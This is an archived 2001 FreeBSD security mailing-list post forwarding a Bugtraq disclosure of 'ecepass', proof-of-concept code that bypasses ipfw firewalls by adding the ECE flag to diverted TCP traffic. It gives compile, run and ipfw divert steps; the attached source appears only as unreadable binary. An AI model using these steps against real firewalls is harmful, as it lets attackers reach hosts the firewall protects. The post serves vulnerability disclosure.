Skip site navigation (1)Skip section navigation (2) 
Date:      Mon, 29 Jan 2001 11:18:44 -0500 (COT)
From:      Buliwyf McGraw <buliwyf@libertad.univalle.edu.co>
To:        freebsd-security@FreeBSD.ORG
Subject:   ecepass - proof of concept code for FreeBSD ipfw bypass (fwd)
Message-ID:  <Pine.BSF.4.21.0101291118150.26984-101000@libertad.univalle.edu.co>
index | next in thread | raw e-mail 

[-- Attachment #1 --]

 Very interesting...

---------- Forwarded message ----------
Date: Thu, 25 Jan 2001 15:04:30 +0200
From: Roelof Temmingh <roelof@SENSEPOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: ecepass - proof of concept code for FreeBSD ipfw bypass

An all ZA production...;)

FreeBSD ipfw+ECE proof of concept code
--------------------------------------

Code written by:
Plathond (jacques4i@yahoo.com) for Sensepost (http://www.sensepost.com,
info@sensepost.com)

More info on the problem:
http://packetstorm.securify.com/advisories/freebsd/FreeBSD-SA-01:08.ipfw

Original problem found by:
Aragon Gouveia <aragon@phat.za.net>

How it works:
-------------
Using FreeBSD divert rule, all outgoing traffic (or as specified in
ipfw rule) will be diverted to the ecepass process - the ECE flag will
be added. Traffic directed to hosts behind ipfw-based firewall will be
passed, rendering the firewall useless if it makes use of the "allow
all from any to any established" rule. Tried & tested...

How to use:
-----------
1. Make sure your kernel is compiled with the following options:
 options         IPDIVERT
 options         IPFIREWALL

2. gcc -o ecepass ecepass.c

3. ./ecepass &

4. ipfw add 5 divert 7000 tcp from any to any

5. All TCP traffic will now have the ECE flag added to it.


PS1: obviously you need to make sure that the last ipfw rule allows
     traffic e.g.:
     00001 divert 7000 tcp from any to any
     65535 allow ip from any to any

PS2: as the exploit uses "ipfw divert" it only works on FreeBSD.
     Ironic eh?

spidermark: sensepostdata ece


Regards,
Roelof.

------------------------------------------------------
Roelof W Temmingh		SensePost IT security
roelof@sensepost.com		+27 83 448 6996
		http://www.sensepost.com		

[-- Attachment #2 --]
~#p:kSH2__VQ6(.r5I#=~mS	{xta웎~S`7x7gl&b=qsfz"V1D?G>]naYLjX(Ce/CZdοR/eǑK<Ô	d=:_hۭAm"ɤx~F1[|:NՑeE@(X&ٯf]'"\@WXA
,@j!	C-%D."]=6n.+	Q,IH玆-61n\s'#.ܙ<Y6<ty
4 <ʒ`80PX.t>=8<
-qhBMV6$i^18}l_	$JH	7_ǓVN&㏣-kЁ,=;e@7-^v.I0@9Ѻ5ru|YxV{J-U[
.}[!$'@
²ДBT((\UټU;x@S`\;]Ht4os9QWGQ'c,![I$,ه"]Ί?oxaV?YQ'-NgE"CxE9n` NUrt}ēNsUĒƲ-Wu>ÝjjT/5.&Iم}dAD3,DB:*h
	u0#֥֔oZVT]8nB8؝-ط+dKCX߻Cif+1KHx4|jFZwpHkcMy86.m"U"qHCvl5䍔g6)t<~v90
@bxw:^,B4Bw:
hx&Bn+cϰL$CTM`mė-n>7֯1 AS40NV#	B7to}
@`mUm"m9?k^ܸil٭M+A|&QJZbX-V
\f-4td\`oHfuLq~kTh$o+l<W[%/#Q*oqˆw~/L(>TY1Jܝ#*~V;?-hPI?iUX#IkhF^5:s,an1g7fYgikV$u)ďyN2<@-%:YYLguD¥km"ir!._7קSuӷӳv]^e@y^1lg^ӖEpC1{%y$J8#|ghs+,t	6J	jܹiFJ$Fgu"UH1uEyNh>2,7ϊP(LfoV'-[̝[*-Zmg桅CMx6s53U>:>;/|dqHKIlTb-jȵIX|}N$HvK4kDwLXE?Hҳd6:d-a̕#Me(mpHJF2Q"Rg%1trQH
Gh¡4,=bݥMh:0LY(=aRBUJ0Jk拪}N(<  2^7cr6J^4&t*
oW\`C'M)S=h^->:ci)Iz,d"Թ4[8-}+pg	2{IV^@]F59vrcUr0؊||ՆdT1`^Bh<- o蛻h+cK?~#Auϫ!^C_!+2RPo$Ǔu9R	_WZOOf?'MlSZ"0ɂYjCeWPQQvJA#8ynpPtkYPJC<@8Ƙ;;̮m^m]_h_
.w=S5M7|k>L2"OG
#UyGMmUPMUQj`O*[EUsM_>	~zQ%(hx?>4xOi|a_O(
help

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.21.0101291118150.26984-101000>